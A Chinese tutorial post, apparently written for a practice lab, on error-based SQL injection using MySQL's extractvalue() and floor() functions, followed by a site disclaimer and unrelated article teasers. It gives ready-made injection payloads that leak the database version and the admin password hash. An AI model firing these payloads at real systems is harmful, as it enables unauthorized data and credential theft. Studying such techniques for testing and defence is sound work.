7.2.SQL注入-基于函数报错extractvalue(),floor()

注入基于函数报错extractvalue(),floor()-字符型

基于extractvalue()

在这里插入图片描述

爆出数据库版本payload语句:
kobe' and extractvalue(0,concat(0x7e,version()))#

爆出数据库版本
在这里插入图片描述

基于floor()

floor()函数就是取整数
在这里插入图片描述

爆出数据版本信息

kobe' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

如图所示:
在这里插入图片描述

将上面的payload语句中的version()换一个获取对应密码的payload语句

kobe' and (select 2 from (select count(*),concat((select password from users where username='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

如果所示,md5值加密的密码信息
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/764021.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

深度解密Spark性能优化之道

深度解密Spark性能优化之道

课程介绍 课程通过实战案例解析和性能调优技巧的讲解,帮助学员提升大数据处理系统的性能和效率。课程内容涵盖了Spark性能调优的各个方面,包括内存管理、并行度设置、数据倾斜处理、Shuffle调优、资源配置等关键技术和策略。学员将通过实际案例的演示和…
阅读更多...
【Altium】如何处理PCB上所有焊盘被误盖油

【Altium】如何处理PCB上所有焊盘被误盖油

【更多软件使用问题请点击亿道电子官方网站】 1、 文档目标 解决焊盘被误盖油的操作 2、 问题场景 所有焊盘都可以设置为盖油或不盖油,由于焊盘需要用来焊接元器件,所以都不会设置盖油。由于误操作或者创建封装时设置错误,造成一定数量的焊盘…
阅读更多...
web基础及http协议

web基础及http协议

一、WEB:就是我们所说的页面,点开的每个页面都是web。(全球广域网、万维网) 分布式图形信息系统:同一个服务,但是部署在不同的机器上且提供的服务和内容全部一致,集群就是建立在分布式的基础上。…
阅读更多...
爬虫逆向实战(42)-某巢登陆(AES、MD5、RSA、滑块验证码)

爬虫逆向实战(42)-某巢登陆(AES、MD5、RSA、滑块验证码)

一、数据接口分析 主页地址:某巢 1、抓包 通过抓包可以发现在登录时,网站首先请求captcha/querySlideImage/来获取滑块验证码的图片,然后请求captcha/checkCode/接口来验证滑块验证码。滑块验证码校验成功后,请求noshiro/getPu…
阅读更多...
nlp--最大匹配分词(计算召回率)

nlp--最大匹配分词(计算召回率)

最大匹配算法是一种常见的中文分词算法,其核心思想是从左向右取词,以词典中最长的词为优先匹配。这里我将为你展示一个简单的最大匹配分词算法的实现,并结合输入任意句子、显示分词结果以及计算分词召回率。 代码 : # happy coding…
阅读更多...
Ubuntu24.04之安装KVM(二百五十五)

Ubuntu24.04之安装KVM(二百五十五)

简介: CSDN博客专家,专注Android/Linux系统,分享多mic语音方案、音视频、编解码等技术,与大家一起成长! 优质专栏:Audio工程师进阶系列【原创干货持续更新中……】🚀 优质专栏:多媒…
阅读更多...
2-18 基于matlab的关于联合对角化盲源分离算法的二阶盲识别(SOBI)算法

2-18 基于matlab的关于联合对角化盲源分离算法的二阶盲识别(SOBI)算法

基于matlab的关于联合对角化盲源分离算法的二阶盲识别(SOBI)算法。通过联合对角化逼近解混矩阵。构建的四组信号,并通过认为设置添加噪声比例,掩盖信号信息。通过SOBI算法实现了解混。程序已调通,可直接运行。 2-18联合…
阅读更多...
JavaScript中location对象的主要属性和方法

JavaScript中location对象的主要属性和方法

属性 href:获取或设置整个URL。protocol:获取URL的协议部分,如"http:"或"https:"。host:获取URL的主机名(包括端口号,如果有的话)。hostname:获取URL的主机名&…
阅读更多...
netlink通信——读取路由表获取通信网卡IP

netlink通信——读取路由表获取通信网卡IP

读取路由表获取通信网卡IP是什么意思呢?且听我一一道来… 下面是我虚拟机两个网卡的IP,很明显两个网卡是不同网段的,我的物理机网卡网段是192.168.1.0/24,与我物理机和外网通信的网卡是ens160,即192.168.31.0/24网段&a…
阅读更多...
2018年全国大学生数学建模竞赛A题高压油管的压力控制(含word论文和源代码资源)

2018年全国大学生数学建模竞赛A题高压油管的压力控制(含word论文和源代码资源)

文章目录 一、部分题目二、部分论文三、部分源代码问题1(1)绘制弹性模量与压力函数图(2)求最优单次开阀时间 问题二(1)极径与极角关系(2)求最优凸轮角速度 四、完整word版论文和源代…
阅读更多...
多语言模型(Multilingual Models)用于推理(Inference)

多语言模型(Multilingual Models)用于推理(Inference)

在深入探讨多语言模型(Multilingual Models)用于推理(Inference)的详细内容时,我们需要首先理解多语言模型的基本概念、它们如何工作、为什么它们在现代自然语言处理(NLP)中变得如此重要&#x…
阅读更多...
物理建模的一个重要概念:因果/非因果建模

物理建模的一个重要概念:因果/非因果建模

物理系统的建模仿真,根据建模思想可划分为: 因果建模(Causal Modeling)非因果建模(Acausal Modeling) 二者的核心思想是通过信号流还是方程来定义模型的行为。 像我们熟知的Simulink就是基于因果建模的思…
阅读更多...
【C++知识点总结全系列 (05)】:IO 类的详细总结和分析

【C++知识点总结全系列 (05)】:IO 类的详细总结和分析

1、基类 istream 和 ostream (1)istream A.What 输入流的抽象类,是所有输入流类的基类 B.Why(输入流的作用) 用于从数据源(如文件、标准输入设备等)读取数据 (2)ostream A.What 输出流的抽象类,是所有输…
阅读更多...
Vue组件间通信方式超详细(父传子、父传后代、子传父、后代传父、兄弟组件传值、没有关系的组件传值)

Vue组件间通信方式超详细(父传子、父传后代、子传父、后代传父、兄弟组件传值、没有关系的组件传值)

Vue组件间通信方式超详细(父传子、父传后代、子传父、后代传父、兄弟组件传值)_vue 父传子-CSDN博客 vue 组件间传值:父传子 / 子传父 / 子传子 / 祖传孙 - 简书
阅读更多...
RFID无线测温技术在数据中心管理中的革新与应用。

RFID无线测温技术在数据中心管理中的革新与应用。

在现代信息技术飞速发展的背景下,数据中心作为承载企业、集团、机构核心业务的关键设施,其可靠性要求极高。随着大数据、云计算等技术的应用日益普及,数据中心面临着前所未有的挑战和机遇。其中,RFID无线测温技术作为一种新兴的智…
阅读更多...
喜报 | 极限科技获得北京市“创新型”中小企业资格认证

喜报 | 极限科技获得北京市“创新型”中小企业资格认证

2024年6月20日,北京市经济和信息化局正式发布《关于对2024年度4月份北京市创新型中小企业名单进行公告的通知》,极限数据(北京)科技有限公司凭借其出色的创新能力和卓越的企业实力,成功获得“北京市创新型中小企业”的…
阅读更多...
Paimon 在汽车之家的业务实践

Paimon 在汽车之家的业务实践

汽车之家基于Paimon的实践 摘要:本文分享自汽车之家的王刚、范文、李乾⽼师。介绍了汽车之家基于 Paimon 的一些实践,和一些背景。内容主要为以下四部分: 一、背景 二、业务实践 三、paimon 优化实践 四、未来规划 一、背景 在使用Paimon之前…
阅读更多...
ACM美国计算机协会简介及个人下载ACM文献途径

ACM美国计算机协会简介及个人下载ACM文献途径

ACM美国计算机协会简介: ACM(Association for Computing Machinery) 创立于1947年, 是全球历史最悠久和最大的计算机教育、科研机构。ACM目前提供的服务遍及全球100多个国家,会员数超过9万名,涵盖工商业&a…
阅读更多...
从入门到深入,Docker新手学习教程

从入门到深入,Docker新手学习教程

编译整理|TesterHome社区 作者|Ishaan Gupta 以下为作者观点: Docker 彻底改变了我们开发、交付和运行应用程序的方式。它使开发人员能够将应用程序打包到容器中 - 标准化的可执行组件,将应用程序源代码与在任何环境中运行该代码…
阅读更多...
用 AI 生成绘本,含大量 prompt

用 AI 生成绘本,含大量 prompt

画图过程,为了保证绘本输出的风格统一,角色连贯,画面内容与故事保持一致 1、画风统一的解决办法:固定一个插画师的风格,可以输入插画师的名字,或者垫图,即上传你需要借鉴风格的图片 2、角色连贯…
阅读更多...
最新文章

Copyright @ 2022~2023